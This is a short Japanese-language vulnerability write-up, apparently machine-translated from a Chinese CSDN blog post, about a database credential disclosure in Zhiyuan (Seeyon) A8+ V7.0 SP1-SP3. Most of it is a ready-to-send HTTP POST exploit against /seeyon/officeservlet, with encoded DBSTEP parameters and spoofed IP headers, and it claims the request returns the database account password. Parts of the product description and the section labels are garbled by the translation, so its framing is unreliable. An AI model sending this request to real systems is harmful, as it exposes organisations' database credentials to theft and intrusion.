Zhiyuan A8+データベースアカウントの機密情報が漏洩

声明
この記事は技術的なコミュニケーションのみを目的としており、違法な目的で使用しないでください。
この記事で提供される情報の普及および利用によって生じる直接的または間接的な結果および損失は、ユーザー自身および著者の責任となります。記事の内容については一切責任を負いません。
記事の著者は、この記事を修正および解釈する権利を有します。この記事を転載または配布する場合は、著作権記述などのすべての内容を含め、この記事の完全性を保証する必要があります。本記事の内容を無断で改変・追加・削除することはできず、いかなる形でも営利目的に利用することはできません。

 

脆弱性の原則

Zhiyuan A8+ は、中国 Zhiyuan Information Technology Co., Ltd. (Inspur) によって開発されたエンタープライズ レベルのサーバー製品です。Zhiyuan のフラッグシップ モデルとして、A8+ は高いパフォーマンス、信頼性、拡張性を提供し、さまざまなエンタープライズ レベルのアプリケーションやデータセンター環境に適しています。Zhiyuan A8+ のフルバージョンには、データベース アカウントのパスワード読み取りの脆弱性があります。

エクスプロイト

影響を受けるバージョン:

Zhiyuan A8+ (V7.0) SP1-SP3

ポック:

脆弱性の悪用箇所は、/seeyon/officeservlet インターフェイスで、このインターフェイスにアクセスした際のレスポンス値が 200 で、以下のレスポンスボディが表示された場合、基本的に脆弱性が存在すると判断できます。

 経験値:

POST http://xxxxxxx/seeyon/officeservlet HTTP/1.1
Host: xxxxxxx
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL=
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 350
DBSTEP V3.0     285             0               0              
RECORDID=wLoi
CREATEDATE=wLehP4whzUoiw=66
originalFileId=wLoi
needReadFile=yRWZdAS6
originalCreateDate=wLehP4whzUoiw=66
OPTION=LKDxOWOWLlxwVlOW
TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli
COMMAND=BSTLOlMSOCQwOV66
affairMemberId=wLoi
affairMemberName=wLoi

経験値を入力してください

データベースアカウントのパスワードを正常に取得しました。

おすすめ

転載: blog.csdn.net/qq_56698744/article/details/132108215